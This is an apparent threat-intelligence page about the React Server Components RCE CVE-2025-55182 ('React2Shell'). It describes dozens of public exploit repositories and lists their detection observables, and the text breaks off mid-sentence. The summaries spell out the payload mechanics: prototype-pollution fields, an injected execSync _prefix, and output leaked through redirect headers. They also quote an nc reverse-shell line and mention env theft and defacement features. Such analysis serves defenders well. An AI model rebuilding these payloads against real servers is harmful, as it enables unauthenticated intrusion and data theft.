React2Shell
CVE-2025-55182, also referred to as React2Shell, is a pre-authentication remote code execution vulnerability in React Server Components affecting the React Server DOM packages react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Affected versions are 19.0.0, 19.1.0, 19.1.1, and 19.2.0; the fixes shipped in 19.0.1, 19.1.2, and 19.2.1. The flaw stems from unsafe deserialization of attacker-controlled payloads received over HTTP by Server Function or Server Action endpoints in the React Flight protocol. In affected deployments, especially frameworks such as Next.js App Router that expose React Server Components functionality, an unauthenticated attacker can submit a crafted request that is deserialized server-side without sufficient validation, leading to arbitrary command or code execution in the application process.
Exploits
32 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (527 hidden).
This repository is a small standalone Ruby exploit tool named react2rubyshell (r2rs). It contains one substantive code file, r2rs.rb, plus a README, license, and gitignore. The script is not a framework module; it is a direct operator-facing exploit that targets a web-accessible vulnerable endpoint associated with CVE-2025-55182 / react2shell. The exploit’s core purpose is to turn a vulnerable HTTP endpoint into an interactive remote shell. The operator supplies a target host, hostname, or full URL, optionally with a port. The script normalizes the target, opens a persistent Net::HTTP connection, and repeatedly sends crafted multipart/form-data POST requests to the target URI. The malicious request body contains a JSON structure designed to abuse a server-side action flow: it injects JavaScript into a field named _prefix and uses process.mainModule.require('child_process').execSync(..., {shell:'/bin/sh', timeout:10000}) to run arbitrary shell commands on the remote host. Output handling is more than a simple one-shot PoC. For each command, the exploit generates a random marker, wraps the shell command so the marker appears before and after command output, and then parses the HTTP response for a "digest" field containing the exfiltrated result. This allows the tool to reliably extract command output from the server response. Before starting the interactive loop, it performs a validation step by echoing a random probe token and confirming that the token is returned. Once validated, the script provides an interactive Readline-based shell experience. It tracks remote context by querying user, hostname, current working directory, and HOME, then updates the prompt after each command. It also preserves a pseudo-session by prepending future commands with a cd into the last known remote working directory. This is not a true PTY, but it is an operational remote shell over HTTP suitable for arbitrary command execution and basic post-exploitation tasks. 
Repository structure is minimal:
- README.md: usage, requirements, examples, and limitations.
- r2rs.rb: full exploit implementation and CLI entry point.
- LICENSE and .gitignore: ancillary files.
Notable exploit characteristics:
- Attack surface: web/network.
- Transport: HTTP or HTTPS to an operator-specified target path.
- Exploit primitive: server-side JavaScript injection leading to Node.js child_process command execution.
- Result: interactive command execution with stdout/stderr capture and lightweight session context.
- Limitations: no true PTY; TTY-sensitive programs may not work well.
Overall, this is a real, functional exploit rather than a detector. It is best classified as OPERATIONAL because it delivers a working remote shell with a hardcoded exploitation method and interactive command loop, but it is not packaged as a larger reusable exploitation framework.
This repository is a small standalone Python exploit project centered on exploit.py, with a README and a minimal requirements.txt. The code is not part of a major exploitation framework. Its stated purpose is exploitation of CVE-2025-55182, described as a prototype-pollution-to-RCE issue affecting Next.js applications using React Server Components. The main capability implemented in the visible code is remote command execution over HTTP against a user-supplied target URL. The script accepts a target URL and either executes a single command (--cmd, default id) or launches a local browser-accessible interface (--web-cli). The local interface is served with Python's http.server/socketserver stack and presents a terminal-like HTML/JavaScript page. Commands entered in the browser are sent to a local endpoint (/run_cmd), which then invokes the exploit's core RCE routine against the remote target and returns the output for display. Based on the README and visible code/comments, the exploit works by sending a crafted payload to a vulnerable Next.js endpoint, abusing prototype pollution to influence internal server-side behavior and trigger Node.js child_process execution. Output is reportedly recovered from an error response field (digest). The exact remote vulnerable path and full request body are not visible in the provided truncated code, so no definitive remote application endpoint can be extracted from the snippet. Repository structure is simple: README.md documents usage and theory, exploit.py contains all exploit logic plus the local web UI server, and requirements.txt lists requests and dependencies. The exploit is operational rather than just a PoC because it includes usable command-execution functionality and an operator interface, but it does not appear weaponized or framework-integrated from the provided material.
This repository is a small standalone exploit repo containing one Python exploit script and a minimal README. The main file, CVE-2025-55182.py, is a command-line RCE exploit for CVE-2025-55182. It is not part of a larger exploitation framework. The exploit is structured around an ExploitConfig dataclass and an Exploit class. The class handles URL normalization, payload generation, vulnerability checking, command execution, interactive shell behavior, and batch scanning with threading. It uses requests for HTTP(S) communication, disables TLS warnings, rotates User-Agent strings, and supports configurable timeout, SSL verification disabling, and thread count. Core capability: the script builds a malicious JavaScript payload that is intended to execute on a vulnerable Node.js-backed web application. The payload calls child_process.execSync() with an operator-supplied command, captures stdout, base64-encodes it, and forces the application into a crafted NEXT_REDIRECT error/redirect flow. The encoded command output is embedded in a redirect to /login with query parameter a, which the exploit can recover and decode. This makes the exploit a true remote command execution tool rather than a detector. Operational modes visible in the script include: check-only mode using the test command 'id'; direct single-command execution; interactive shell mode; and batch scanning of targets from a file using a thread pool. The script prints status messages and can be used to validate vulnerability or repeatedly run arbitrary commands. Fingerprintable observables are limited because the target endpoint path appears to be dynamically crafted in truncated code, but the payload clearly references /login as the redirect sink for exfiltration. The exploit accepts arbitrary target base URLs over HTTP or HTTPS and defaults to HTTPS when no scheme is provided. No hardcoded IPs, domains, registry keys, or external C2 infrastructure are present. 
Overall, this is an operational standalone Python web exploit for unauthenticated or low-friction remote command execution against a vulnerable web application implementing the affected server-side JavaScript request handling path.
Repository contains a single Python 2.7 exploit script and a README. The main file, CVE-2025-55182.py, is a standalone exploit for CVE-2025-55182 targeting vulnerable Next.js applications. It supports two modes: (1) single-target interactive command execution and (2) multithreaded mass scanning from a file of targets. The exploit normalizes user input to HTTPS by default, appends /login when no path is provided, and sends a crafted multipart/form-data POST request with specially structured fields intended to trigger prototype pollution and constructor abuse in a Next.js server-side context. The injected JavaScript payload uses process.mainModule.require('child_process').execSync() to run arbitrary OS commands and then forces a redirect whose digest embeds the command output in /login?a=<output>. The script parses the x-action-redirect response header to determine success and recover output. Mass-scan mode uses a Queue with worker threads and writes successful results to a local file. Overall, this is a real exploit rather than a detector: its primary capability is unauthenticated remote command execution with basic output retrieval, packaged as an operator-friendly shell/scanner.
Small standalone PoC repository with two files: a README describing CVE-2025-55182 and affected React/Next.js versions, and a single Python exploit script. The exploit uses argparse to accept a target URL (-u) and arbitrary command (-c), then sends a multipart/form-data POST request with a crafted JSON structure intended to abuse React Server Components / Next.js server action processing. The malicious payload injects JavaScript into the server-side processing path, uses process.mainModule.require('child_process').execSync() to run the supplied command with a 5-second timeout, converts stdout to a string, and throws a manipulated NEXT_REDIRECT error containing the command output in the digest field. The script prints the HTTP status code and response body, allowing the operator to observe execution results. There is no scanning, brute force, persistence, or post-exploitation automation; it is a direct RCE proof-of-concept against a user-specified web endpoint.
This repository is a self-contained educational lab for CVE-2025-55182, demonstrating remote code execution against React Server Components/Next.js Server Actions via prototype pollution in Flight deserialization. The repo contains three main parts: (1) exploit/exploit.py, a Python exploit that crafts a malicious multipart/form-data Flight payload and POSTs it to the target root with Next-Action and X-Nextjs-Request-Id headers; (2) vulnerable/, a Next.js app using React 19.2.0 with a Server Action in app/actions.ts exposed through a form in app/page.tsx; and (3) patched/, a comparison app using React 19.2.1 without the vulnerable Server Action path. Docker Compose exposes the vulnerable app on port 3011 and the patched app on 3012. The exploit’s core capability is unauthenticated remote command execution. It builds a Flight object containing a reference chain to __proto__.then, causing Object.prototype.then pollution during deserialization. The injected JavaScript then executes process.mainModule.require('child_process').execSync(<command>) on the Node.js server. Output is base64-encoded and exfiltrated by throwing a crafted NEXT_REDIRECT error whose digest is reflected in the X-Action-Redirect response header. The script then parses that header and decodes the command output. Repository structure supports both exploitation and validation: README.md documents usage and expected behavior; docs/CVE-2025-55182.md explains the vulnerability, exploit chain, affected versions, and mitigations; vulnerable/ and patched/ provide reproducible targets. This is a real exploit PoC rather than a detector. It is operational but not heavily weaponized: the payload is customizable only through a supplied command argument, and the exploit logic is purpose-built for this specific vulnerability and lab setup.
This repository is a small standalone Python exploit PoC for CVE-2025-55182, with README documentation, one executable script, and a minimal requests dependency. The main file, cve-2025-55182.py, is the sole code artifact and acts as the entry point. It is not part of a larger exploit framework. The exploit targets vulnerable React Server Components / Next.js Server Actions deployments over HTTP(S). It builds a crafted multipart/form-data POST body that abuses the RSC wire protocol using a poisoned object with __proto__ pollution, constructor.constructor access, and a malicious _prefix JavaScript expression. The injected JavaScript executes synchronously on the server, uses Node.js child_process.execSync to run arbitrary OS commands, Base64-encodes stdout, and throws a forged NEXT_REDIRECT error so the application returns the output inside the x-action-redirect header. The script then parses either x-action-redirect or Location for the ?a= parameter, URL-decodes it, and Base64-decodes it for display. Capabilities include single-command execution (-c) and an interactive pseudo-shell (--shell), though the shell is stateless and sends one HTTP request per command. The operator can also override the Host header for virtual-hosted targets, set request timeouts, and enable verbose output to inspect raw response headers. There is no reverse shell, persistence, or callback infrastructure; exfiltration is entirely in-band via the HTTP response headers. Repository structure is simple: README.md provides vulnerability background, affected versions, usage examples, and references; requirements.txt lists requests>=2.28.0; .gitignore excludes Python artifacts and lab files. Overall, this is an operational but lightweight exploit script intended to demonstrate pre-authenticated RCE against vulnerable Node.js-based Next.js/React Server Components applications.
This repository is a small standalone Go exploit for CVE-2025-55182, described as React Server Components RCE via prototype pollution. It contains only two files: a README with usage examples and main.go implementing the exploit logic. The code is not a scanner or detector; it is an active exploitation tool that sends a crafted multipart/form-data POST request to a user-specified target URL. The exploit flow is straightforward: main() parses -t and -c arguments, normalizes the target URL (defaulting to HTTPS if no scheme is provided), prints status banners, and calls execute(). execute() builds a malicious multipart body in buildPayload(), sets Next.js-related headers in craftHeaders(), disables TLS verification, disables redirect following, and POSTs directly to the supplied target URL. The injected payload abuses a prototype-pollution-style object structure and embeds JavaScript that invokes process.mainModule.require('child_process').execSync('<command>') on the remote Node.js process. The command output is base64-encoded server-side and embedded into a forged NEXT_REDIRECT digest pointing to /login?a=<encoded>. parseResponse() then extracts the X-Action-Redirect header, regex-matches the /login?a= parameter, URL-decodes it, base64-decodes it if possible, and prints the recovered command output. Notable capabilities: arbitrary command execution, output retrieval, support for arbitrary operator-supplied commands, and practical post-exploitation use such as reading files or launching a reverse shell. The README explicitly demonstrates id, ls -la, cat /etc/passwd, and a busybox nc reverse shell. The exploit is operational rather than a bare PoC because it includes a complete request builder, response parser, CLI, and output handling, but it is still a simple standalone tool rather than a framework-integrated or highly modular weaponized exploit. 
Fingerprintable artifacts include the custom headers Next-Action, X-Nextjs-Request-Id, and X-Nextjs-Html-Request-Id; the multipart boundary string ----HacxMeBoundaryX9K2pLvN4MqR8TdF; the exfiltration path /login?a=...; and the expectation of an X-Action-Redirect response header. The code also uses a Firefox-like User-Agent string and sets InsecureSkipVerify=true for TLS. Overall, the repository’s purpose is to provide a command-line RCE exploit against a vulnerable Next.js/React Server Components target over HTTP(S).
This repository is a small standalone exploit project with two files: a README describing CVE-2025-55182 ('React2Shell') and a single Python entry point, exploit.py. The exploit targets vulnerable React Server Components / Next.js Server Actions by sending a crafted multipart/form-data POST request to the application root with a Next-Action header. The malicious Flight payload abuses insecure deserialization of a thenable object so that server-side JavaScript reaches child_process.execSync(), yielding pre-authentication RCE. The Python script appears to implement three operator-facing modes described in the README: check, exec, and revshell. It uses requests for HTTP transport, supports optional proxying and randomized User-Agent selection, normalizes target URLs, and can auto-detect the operator IP address via tun0 or a UDP socket to 8.8.8.8. The payload builder constructs a multipart body with a fixed boundary and embeds JavaScript that executes an arbitrary shell command via process.mainModule.require('child_process').execSync(...). Output is transformed and exfiltrated by throwing a crafted NEXT_REDIRECT error so the server returns a 307 redirect with the result encoded in the X-Action-Redirect header. This makes the exploit more than a detector: it provides direct command execution and output retrieval. The repository also includes reverse shell support with multiple hardcoded templates: bash, python3, nc, mkfifo, and node. These payloads connect back to an operator-supplied host and port, defaulting to port 4444 and optionally auto-detecting the local host IP. Because the payloads are predefined but selectable and the exploit is a standalone script rather than a larger framework module, the maturity is best characterized as OPERATIONAL.
Notable fingerprintable observables include POST requests to the target root path '/', the Next-Action request header, the X-Action-Redirect response header, and the redirect path '/login?a=...;307;' used for output exfiltration. The README contains example targets and proxies such as http://10.10.11.50 and http://127.0.0.1:8080. Overall, the repository's purpose is offensive exploitation of a web-exposed deserialization flaw in React/Next.js applications, enabling unauthenticated command execution and shell access.
This repository is a small proof-of-concept exploit package combining a benign-looking Next.js web app with a Python exploit script. The main exploit logic is in react-exp.py; the rest of the repository is largely a standard Next.js 16 application scaffold used as a local target/demo environment. The Python script accepts a base URL and optional command, builds a multipart/form-data POST request, and sends it to the target root path with a custom 'Next-Action' header. Its crafted JSON chunk abuses JavaScript prototype/constructor access patterns and injects a server-side JavaScript prefix that calls process.mainModule.require('child_process').execSync(...) to run an arbitrary shell command. The default command is 'id'. The payload then throws a NEXT_REDIRECT error object with the command output embedded in the digest field, allowing the operator to recover execution results from the HTTP response body. A commented alternate payload shows command execution without output capture. Repository structure: README.md contains usage steps; react-exp.py is the actual exploit; app/page.tsx, app/layout.tsx, globals.css, and config files form a simple branded Next.js site used for demonstration. No persistence, lateral movement, or secondary payload delivery is present. This is an operational RCE PoC rather than a detection script.
This repository is a small standalone Python proof-of-concept exploit for CVE-2025-55182, with README references also tying the issue to Next.js as CVE-2025-66478. The repository contains three files: a single exploit script (CVE-2025-55182.py), a README with usage/examples, and an MIT license. The Python script is the sole code file and main entry point. The exploit sends a crafted HTTP POST request using the requests library to an operator-supplied URL. It sets custom headers including Host: localhost, Next-Action: x, and a fixed multipart/form-data boundary. The POST body embeds a malicious serialized structure designed to trigger unsafe server-side behavior in React Server Components processing. The key execution primitive is injected into the _prefix field as JavaScript: process.mainModule.require('child_process').execSync('<command>');, which attempts to execute an arbitrary shell command on the target Node.js server. Capabilities are straightforward but dangerous: remote arbitrary command execution against a vulnerable server-side React/Next.js deployment. The script accepts a target URL and optional command-line command parameter; if omitted, it defaults to 'id'. It prints the target, command, and HTTP status code, but does not implement output retrieval, session handling, or advanced exploitation logic. Because it includes a usable hardcoded RCE primitive and supports arbitrary operator-supplied commands, it is more than a detection script but still a relatively simple PoC/operational exploit. No exploit framework is used. There is no persistence, privilege escalation, or lateral movement logic in the repository. The README includes an example reverse-shell command using netcat (nc 10.0.2.4 4444 -e sh), indicating intended post-exploitation use, but the exploit itself only delivers command execution and leaves payload selection to the operator.
Repository is a small standalone PoC/demo for CVE-2025-55182 ('React2Shell'). It contains both a vulnerable lab environment and a Python exploit. The vulnerable app is a minimal Next.js App Router project (`src/app/layout.js`, `src/app/page.js`) with dependencies pinned to Next.js 15.0.0 and React/react-server-dom-webpack 19.0.0 RC builds. `Dockerfile` builds and runs this app in a Node 20 Alpine container, exposing port 3000 and launching `next dev`. The main exploit logic is in `exploit.py`. It sends a single crafted `multipart/form-data` POST request to the target URL, defaulting to `http://localhost:3000`. The payload is a malicious React Flight object designed to abuse prototype traversal (`__proto__`) and constructor access (`constructor:constructor`) during deserialization. It injects JavaScript into the `_prefix` field that invokes `process.mainModule.require('child_process').execSync(...)`, yielding arbitrary command execution on the server. The default command creates `/tmp/success.txt`, but the script accepts a custom command and optional target URL via command-line arguments. Capabilities: unauthenticated web-based RCE against vulnerable React Server Components / Next.js targets; customizable command execution; basic response/status output for operator feedback. This is not a detection-only script and not obviously fake. It is best classified as an operational PoC: the payload is real and functional, but customization is limited to raw command strings rather than a full exploitation framework.
This repository is a controlled academic exploit lab for CVE-2025-55182 ('React2Shell'), modeling an unauthenticated RCE condition in React Server Components. It is not tied to a common exploit framework; instead it contains a standalone dual-profile lab with a vulnerable app, a patched app, Docker infrastructure, PowerShell automation, scenario testing, and extensive documentation/reporting. Core exploit logic resides in app/vulnerable/src/framework/entry.rsc.tsx. That handler clones incoming requests, parses POST JSON, extracts the __flight_action field, and passes it directly to node:child_process execSync with shell '/bin/sh'. This creates a network-reachable command-execution primitive over the .rsc endpoint. The response returns JSON containing the executed action and trimmed command output. Telemetry is written to logs/vulnerable-requests.log and suspicious requests are tagged with flight_action_injection. The patched counterpart in app/patched/src/framework/entry.rsc.tsx performs pre-deserialization validation: if a POST body contains __flight_action, it immediately returns HTTP 403 with JSON explaining the block and logs the event. It also blocks suspicious .rsc requests more generally with HTTP 400 based on probe query strings, unexpected methods, or JSON content types. The repository structure is clear and purposeful: app/vulnerable and app/patched each contain a minimal Vite/React RSC application; infra/ contains Dockerfiles and docker-compose exposing the vulnerable service on 3100 and patched service on 3200; scripts/ contains helper scripts including exploit-shell.ps1, which turns the RCE primitive into an interactive pseudo-shell by repeatedly POSTing __flight_action commands; tests/run-scenarios.mjs automates baseline, suspicious, and exploit scenarios and writes tests/results/scenario-report.json; docs/ and report/ document architecture, validation, telemetry, scenarios, and findings. 
Main exploit capabilities: unauthenticated remote command execution, command output retrieval, filesystem enumeration, environment disclosure, host/container reconnaissance, and interactive shell-like operation against the vulnerable lab target. The exploit is operational rather than heavily weaponized: payloads are simple shell commands, hardcoded transport is HTTP POST to /.rsc, and the included shell wrapper is interactive but basic.
Repository is a standalone proof-of-concept for CVE-2025-55182, centered on delivering crafted multipart/form-data requests to vulnerable Next.js server action/request parsing paths to achieve server-side code execution. The top-level POC directory contains the actual exploit artifacts: exploit.sh builds a multipart body in /tmp/exploit_payload.txt and POSTs it to http://localhost:3000/ with a hardcoded Next-Action ID; payload.http is a raw reproducible HTTP request targeting http://localhost:3001/; poc.py is the most flexible PoC, using Python requests to send the malicious multipart fields and demonstrating both local command execution and commented exfiltration options to https://a.m.pipedream.net; test-exploit.sh is a simpler curl-based tester against http://localhost:3000/api. The exploit primitive relies on malicious JSON fields such as then="$1:__proto__:then" and _formData.get="$1:constructor:constructor" combined with _response._prefix containing JavaScript that invokes process.mainModule.require('child_process').execSync(...). Demonstrated commands include whoami, ls -la, echo "pawned", and writing /tmp/rce-triggered.txt, indicating arbitrary command execution capability. The repository also includes two intentionally weak Next.js applications, weak-server and weak-server-2, used as local lab targets. Both expose a server action in app/actions.ts and a POST handler in app/api/route.ts that parses formData and logs headers/body. weak-server pins Next.js 16.0.6 with React 19.2.0, while weak-server-2 uses Next.js ^15.0.0 with React ^19.0.0. Overall, this is a real exploit PoC repository with bundled vulnerable test environments, not merely a detector or README.
This repository is a small standalone Python exploit for CVE-2025-55182, accompanied by a brief README. The main file, CVE-2025-55182.py, implements an interactive RCE client targeting a web application believed to be vulnerable through React Server Components / Next.js request handling. The script prompts for a target URL or IP, normalizes it to HTTP(S), derives the Host header, and sends a crafted multipart/form-data POST request directly to the target base URL. The exploit payload is embedded in the multipart body as JavaScript intended to execute on the server. It uses process.mainModule.require('child_process').execSync(...) to run arbitrary shell commands with a 5-second timeout, converts the output to a string, and exfiltrates the result by throwing a NEXT_REDIRECT error whose digest field contains command output. The script then parses the HTTP response body with regex to recover that digest and display it to the operator. Operationally, the tool behaves like a lightweight remote shell. It maintains a client-side notion of current working directory starting at /tmp and provides helper commands: cd updates the local path state, pwd prints it, ls runs 'ls -la' remotely, and cat reads remote files. Any other input is wrapped as 'cd <current_dir> && <user command>' and executed remotely. This makes the exploit more than a bare proof of concept: it is an operational interactive command-execution tool, though payload customization is manual and limited. Repository structure is minimal: one Python code file and one README. There is no framework integration, no detection-only logic, and no obvious destructive fake behavior. The exploit is clearly intended for direct operator-driven remote command execution against vulnerable React/Next.js deployments.
This repository is a multi-component security toolkit centered on CVE-2025-55182 ('React2Shell'), a claimed pre-auth React Flight / React Server Components deserialization RCE affecting React and Next.js. It is not just a detector: the `react2shell-scanner` component contains active exploitation logic exposed through `cli.py` and `exploit.py`, supporting safe-probe detection plus post-detection actions such as file read, directory listing, and arbitrary command execution against target web applications. The exploit path is web/network-based and appears to rely on crafted multipart/form-data POST requests with a `Next-Action` header to root or RSC-related endpoints, aiming to trigger digest errors or execute injected Node/JS primitives. Repository structure has three main tools: (1) `react2shell-scanner/` for GitHub org scanning, GCP infrastructure enumeration, and exploit testing; (2) `gcp-ioc-scanner/` for querying GCP Cloud Logging using IOC YAML definitions; and (3) `gcp-log-correlator/` for correlating suspicious trigger events with preceding HTTP requests on the same Kubernetes pod. There is also a deliberately vulnerable `react2shell-scanner/test-app/` Next.js fixture used to validate payloads and demonstrate exploitation behavior. Key code files include Python entry points (`react2shell-scanner/cli.py`, `react2shell-scanner/exploit.py`, `gcp-ioc-scanner/gcp-ioc-scanner`, `gcp-log-correlator/gcp-log-correlator`), shell wrappers (`react2shell-scanner/bin/scan-github`, `scan-gcp`, `scan-all`), and helper libraries (`lib/check-version.py`, `lib/scanner-common.sh`, `utils.py`). Languages present are primarily Python, shell/bash, JavaScript, YAML, and Docker configuration. Operationally, the GitHub scanner uses `gh api` to fetch `/repos/$ORGANIZATION/$repo/contents/package.json` and checks dependency versions against vulnerability definitions. 
The GCP scanner enumerates Artifact Registry, Cloud Run, and GKE resources using `gcloud`, but its vulnerability analysis is mostly inventory/pending-scan oriented rather than a full exploit. The IOC scanner builds Cloud Logging filters for namespaces/pod regexes and searches for patterns such as `E{"digest"`, prototype traversal strings, and suspicious POSTs to `/_next/data/` or `/api/.*Server`. The correlator then links suspicious error events to inbound HTTP requests by timestamp proximity. Overall, this is a real exploit-oriented toolkit with supporting exposure discovery and cloud log hunting capabilities, not merely a README or pure detection script. The exploit component is best classified as OPERATIONAL: it includes concrete payload-driven actions, but customization appears manual and outside a major exploitation framework.
This repository is a real exploit project centered on exploit/react2shell.py, a standalone Python exploit for CVE-2025-55182 affecting React Server Components in vulnerable React/Next.js deployments. The repository also includes extensive markdown analysis, a deliberately vulnerable Next.js lab application, an auxiliary curl-based exploit script, and a restoration script for resetting the lab after destructive testing. The main exploit is not merely a detector: it builds a malicious multipart/form-data request that targets Next.js Server Action / React Flight deserialization. The payload abuses prototype pollution ("$1:__proto__:then") and constructor traversal ("$1:constructor:constructor") to reach the JavaScript Function constructor, then executes attacker-controlled JavaScript in the Node.js process. That JavaScript invokes child_process.execSync() to run arbitrary shell commands. Command output is exfiltrated by throwing a NEXT_REDIRECT error whose digest is converted by Next.js into the X-Action-Redirect response header, typically embedding output in a /login?a=... redirect value. Capabilities described and partially visible in the code/docs include: vulnerability checking with a benign echo command, arbitrary command execution, interactive shell mode, environment-variable theft using a temp file and line-by-line reads to bypass header-size limits, website defacement, deletion of project/dashboard content, and server shutdown/DoS actions. This makes the exploit operational rather than a simple PoC.
Repository structure:
- exploit/react2shell.py: primary exploit implementation in Python using requests and argparse.
- exploit/exploit-explanation.md: usage and architecture documentation.
- docs/analysis/*.md: root-cause analysis, payload anatomy, and disclosure timeline.
- vulnerable-app/: intentionally vulnerable Next.js 15.0.0 + React 19.0.0 demo target.
- vulnerable-app/curl_id.sh: bash/curl variant of the exploit.
- vulnerable-app/scripts/restore.sh: lab restoration helper.
Fingerprintable observables include the target root path /, local demo URL http://localhost:3000, required headers Next-Action / X-Nextjs-Request-Id / X-Nextjs-Html-Request-Id, response header X-Action-Redirect, exfiltration redirect path /login?a=${res}, and temp file /tmp/stolen_env.txt. The vulnerable app itself exposes a server action in vulnerable-app/app/actions.ts and a client page in app/page.tsx, but the vulnerability is in the underlying React/Next.js deserialization path rather than in custom application logic.
This repository is a small standalone Python exploit toolkit consisting of one main code file (react2shell.py) and a README. It is not part of a major exploitation framework. The script is positioned as an exploitation suite for CVE-2025-55182 affecting Next.js applications and combines reconnaissance, scanning, exploitation, and post-exploitation style interaction.
Repository structure:
- README.md: Describes the claimed vulnerability, usage modes, features, and example workflows.
- react2shell.py: Main executable Python script with CLI handling, subdomain enumeration logic, HTTP probing, and shell/exploitation workflow.
Observed capabilities from the provided content:
- Single-target mode via -u/--url.
- Multi-target mode via -f/--file.
- Domain reconnaissance mode via -d/--domain for subdomain enumeration followed by scanning/exploitation.
- DNS-based subdomain resolution using dnspython when available.
- HTTP/HTTPS probing of candidate subdomains using requests with TLS verification disabled.
- Interactive shell abstraction through an EnhancedShell class referenced in main.
- Claimed remote file operations (.upload, .download, .create) and output saving.
- Claimed vulnerability scanning against common web paths associated with Next.js deployments.
The exploit’s attack vector is web/network based. The README states the vulnerability is triggered through a malicious multipart/form-data request against a Next.js target, leading to arbitrary command execution by abusing Node.js child_process loading via process.mainModule.require('child_process'). Output is said to be base64-encoded and leaked through a redirect parameter (/login?a=). Although the full exploit implementation is truncated in the provided content, the script clearly goes beyond detection and is intended to obtain command execution and an operator shell.
Notable endpoints and targets include generic HTTP/HTTPS target URLs, DNS-derived subdomains, scanner paths such as /, /api, /api/auth, /_next, /admin, and /dashboard, and the redirect exfiltration path /login?a=. The README also documents remote file paths used in examples, including /tmp/shell.php, /etc/passwd, /tmp/test.txt, and /tmp/backdoor.sh. Overall assessment: this is an operational standalone exploit tool rather than a simple PoC or detector. It appears designed to help an operator discover candidate Next.js hosts, test them, and if exploitation succeeds, interact with the compromised host through a command shell interface.
Repository is a small standalone Python proof-of-concept exploit with 3 files: one Python exploit script, a README, and an Apache 2.0 license. The main and only code file, CVE-2025-55182.py, implements a full exploit chain against a vulnerable React Server Components deployment over HTTP/HTTPS.
Structure and behavior:
- parse_base_url() normalizes the user-supplied target into scheme://host:port/path form, defaulting to http and port 80.
- passive_scan() performs an initial GET to the base URL and looks for React Server Components indicators such as Content-Type text/x-component, window.__next_f, and react-server-dom-webpack strings.
- fingerprint() performs an active GET with header RSC: 1 and checks for text/x-component responses, Vary: RSC, and body patterns matching the React Flight protocol.
- build_payload() creates a malicious JSON object designed to abuse unsafe deserialization/prototype access and invoke Node.js child_process.execSync(command), base64-encoding command output.
- build_payload_body() wraps that JSON into a multipart/form-data body with fields 0, 1, and 2.
- exploit() POSTs the crafted body to a random UUID path under the target, using several Next.js-like headers. It then extracts a JSON error block from the response, reads the digest field, base64-decodes it, and prints the command output.
- main() ties the workflow together: parse target, passive scan, active fingerprint, then exploit with a required --command argument.
Capabilities:
- Pre-authentication remote command execution against a vulnerable web application using React Server Components.
- Basic target fingerprinting before exploitation.
- Retrieval of command output from the HTTP response.
- Supports arbitrary operator-supplied commands, including reverse shell one-liners shown in the README.
Notable observations:
- This is not merely a detector; it contains a working exploit path and payload generation logic.
- The exploit is operational rather than heavily weaponized: it accepts arbitrary commands but does not include advanced session handling, staging, persistence, or automated target discovery.
- README has an inconsistency in the title mentioning CVE-2026-33017 while the script and linked reference target CVE-2025-55182; the code itself clearly implements exploitation for the latter.
- The exploit appears aimed at Node.js-backed React/Next.js-style environments where React Server Components request handling is exposed and vulnerable.
This repository is a small Node.js attacker panel that operationalizes an RCE exploit for CVE-2025-55182, described in the UI as a React Server Functions / React Flight Protocol prototype-pollution issue leading to access to the Function constructor and arbitrary code execution. The repo contains 4 files: a Dockerfile for containerized deployment, package.json defining Express, node-fetch, and form-data dependencies, a static frontend at public/index.html, and the main backend exploit logic in the file named 'server'. The frontend provides a simple web panel where an operator enters a target URL and an arbitrary shell command. It POSTs these values to the local /proxy endpoint. The backend then builds a crafted multipart/form-data request containing a malicious serialized object ('crafted_chunk') with __proto__ and constructor traversal primitives intended to trigger the vulnerable server-side React/Next.js behavior. The injected JavaScript payload uses process.mainModule.require('child_process').execSync(...) with a 5-second timeout to run the supplied command on the target. Output is embedded into a thrown NEXT_REDIRECT error's digest field, which the exploit then parses from the HTTP response and returns to the operator. The exploit is not merely a detector; it is an active RCE tool with a usable operator interface. It does not appear to be part of a major exploitation framework. The implementation is basic but functional: command input is escaped before insertion into the JavaScript payload, the target request uses the Next-Action header and multipart form data, and the server listens on port 8080 to expose the attacker panel. The Dockerfile suggests intended easy deployment as a standalone web-based exploitation service.
This repository is a Firefox browser extension named R2SAE (React2Shell Auto-Exploit) built to detect and exploit CVE-2025-55182, described as a prototype pollution issue in Next.js React Server Actions that can lead to remote code execution. It is not just documentation: the repository contains active exploit logic in JavaScript, a browser manifest, and a popup-based operator UI. Repository structure is small and focused: manifest.json defines the Firefox extension, permissions, background script, and browser action; background.js contains the core exploitation workflow, request/response interception, output capture, and bulk scan orchestration; popup.js implements the operator-facing logic for scanning, command execution, shell-like interaction, persistence, and export; popup.html and popup.css provide the interface; README.md documents usage and the claimed vulnerability. The main exploit capability is remote command execution against vulnerable Next.js targets. The extension builds crafted multipart/form-data payloads using a fixed WebKit-style boundary and sends POST requests intended for Next.js Server Actions. It modifies outbound headers for requests containing the Next-Action header, stripping and rewriting Origin/Host-related values to improve exploit delivery. It then listens for response headers and extracts encoded command output from the X-Action-Redirect header, specifically matching a /login?a=... pattern. The code includes a decoder that URL-decodes the captured value, replaces @ with newlines, and base64-decodes the result. Operational features include: single-target vulnerability testing using a harmless marker command (echo VULN_MARKER_12345), arbitrary command execution, pseudo-shell interaction, bulk scanning with resumable state stored in browser.storage.local, per-site UI state persistence, and export of results. 
The bulk scanner resolves URLs, executes the exploit sequentially, marks targets vulnerable when the marker is observed in decoded output, and records errors/server-down conditions. The exploit is best classified as OPERATIONAL rather than a simple POC because it contains working delivery, output capture, UI, persistence, and bulk-scanning logic, but it is not part of a larger exploitation framework. The attack surface is primarily web/network via a browser extension acting against arbitrary remote URLs.
This repository is a small standalone Python proof-of-concept exploit consisting of one executable script (CVE-2025-55182.py), a README, and a license file. It is not part of a larger exploitation framework. The Python script uses requests and argparse to target an HTTP/HTTPS application believed to expose vulnerable React Server Components / Next.js-style server functionality. The exploit workflow has three stages: (1) passive scanning of the base URL for indicators such as Content-Type text/x-component, window.__next_f, and react-server-dom-webpack; (2) active fingerprinting by sending the RSC: 1 header and checking for text/x-component, Vary: RSC, and React Flight protocol-like response bodies; and (3) exploitation by POSTing a crafted multipart/form-data body to a random UUID path under the target base URL. The malicious payload is a serialized object designed to reach JavaScript constructor/prototype paths and ultimately execute Node.js code on the server. Specifically, it invokes process.mainModule.require('child_process').execSync('<command>'), base64-encodes stdout, and throws an error object whose digest field carries the encoded output back in the HTTP response. The Python client extracts that digest, decodes it, and prints the command output. Because the command is operator-controlled via --command, the exploit supports arbitrary command execution, including reverse shells as shown in the README example. Notable implementation details: the target path is randomized with a UUID; the exploit uses several Next.js-like headers (Next-Action, X-Nextjs-Request-Id, X-Nextjs-Html-Request-Id); and the multipart body contains three form fields with the serialized payload and references. The README appears to contain a typo in the title (CVE-2026-33017) while both the 